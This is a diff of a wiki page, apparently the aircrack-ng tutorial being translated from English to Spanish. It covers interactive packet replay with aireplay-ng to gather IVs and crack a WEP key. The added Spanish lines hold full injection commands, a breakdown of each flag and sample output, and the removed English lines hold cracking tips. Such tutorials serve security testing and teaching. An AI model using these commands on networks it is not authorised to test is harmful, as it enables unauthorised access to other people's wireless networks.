 +OK, ahora te estarás preguntando ¿porque no te enseño esta técnica paso a paso? La razón es que con esta técnica se reenvian todos los paquetes que recibas.  Por lo que si recibes un paquete de 1000 byte entonces reenviaras 1000 bytes.  Esto reduce de forma muy importante el número de paquetes capturados por segundo.  Aunque, como ventaja podemos destacar que es muy simple y muy fácil de hacer.  Además puede que tengas suerte y que recibas un paquete muy pequeño para reenviar.  En este caso, esta técnica funcionará tan bien como la descrita con anterioridad en este tutorial. 
 + 
 +Hay que tener en cuenta las mismas consideraciones y realizar con anterioridad una falsa autenticación. 
 + 
 +Escribe el siguiente comando: 
 + 
 +   aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 
 + 
 +Donde: 
 +  *-2 significa que usamos el modo interactivo para seleccionar el paquete 
 +  *-p 0841 fija el "Frame Control" para que parezca que el paquete se está enviando desde un cliente wireless. 
 +  *c FF:FF:FF:FF:FF:FF fija la dirección MAC de destino como "broadcast". Esto se requiere para que el AP reenvie el paquete y así consigamos un nuevo IV
 +  *-b 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso 
 +  *-h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta y debe coincidir con la utilizada en la falsa autenticacion 
 +  *ath0 es el nombre de nuestra interface 
 + 
 +El sistema nos contestará: 
 + 
 +   Read 698 packets... 
 +    
 +        Size: 86, FromDS: 1, ToDS: 0 (WEP) 
 +    
 +             BSSID  =  00:14:6C:7E:40:80 
 +         Dest. MAC  =  FF:FF:FF:FF:FF:FF 
 +        Source MAC  =  00:D0:CF:03:34:8C 
 +   
 +        0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@. 
 +        0x0010:  00d0 cf03 348c a0f4 2000 0000 e233 962a  ....4... ....3.* 
 +        0x0020:  90b5 fe67 41e0 9dd5 7271 b8ed ed23 8eda  ...gA...rq...#.. 
 +        0x0030:  ef55 d7b0 a56f bc16 355f 8986 a7ab d495  .U...o..5_...... 
 +        0x0040:  1daa a308 6a70 4465 9fa6 5467 d588 c10c  ....jpDe..Tg.... 
 +        0x0050:  f043 09f6 5418                           .C..T. 
 +    
 +   Use this packet ? y 
 + 
 +Escribes "y" para seleccionar el paquete y empezar la inyección.  Recuerda, cuanto más pequeño sea el paquete mucho mejor.  Al empezar la inyección verás algo como esto: 
 + 
 +   Saving chosen packet in replay_src-0411-145110.cap 
 +    
 +   Sent 10204 packets...(455 pps)
  
-You can run this while generating packets.  In a short time, the WEP key will be calculated and presented.   You will need approximately 250,000 IVs for 64 bit and 500,000 IVs for 128bit keys.   These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.+Si aun no has iniciado airodump-ng, ejecútalo ahora.  Una vez que tengas suficientes IVs, puedes iniciar aircrack-ng e intentar averiguar la clave WEP.
  
-Troubleshooting Tips:+Otra variación de este ataque es usar paquetes de una captura anterior.  Debes de tener guardados los paquetes enteros, y no solo los IVs.
  
-  *Sometimes you need to try various techniques to crack the WEP key.  Try "-n" to set various key lengths.  Use "-f" and try various fudge factors.  Use "-k" and try disabling various korek methods.+A continuación puedes ver como sería el comando:
  
 +   aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -r capture-01.cap ath0
  
-=====Change Log ===== +Donde "-r capture-01.cap" es el archivo de una captura anterior.
-Februray 16/2007 +
-  * Added video from [[http://www.offensive-security.org|Offensive-Security]]+
  
-February 10/2007 v1.02 
-  * Added the assumption with regards to open authentication 
  
-February 7/2007 v1.01 
-  * Incorporated correction and feedback from cjaghblb 
  
-February 4/2007 v1.00 
-  * Initial Release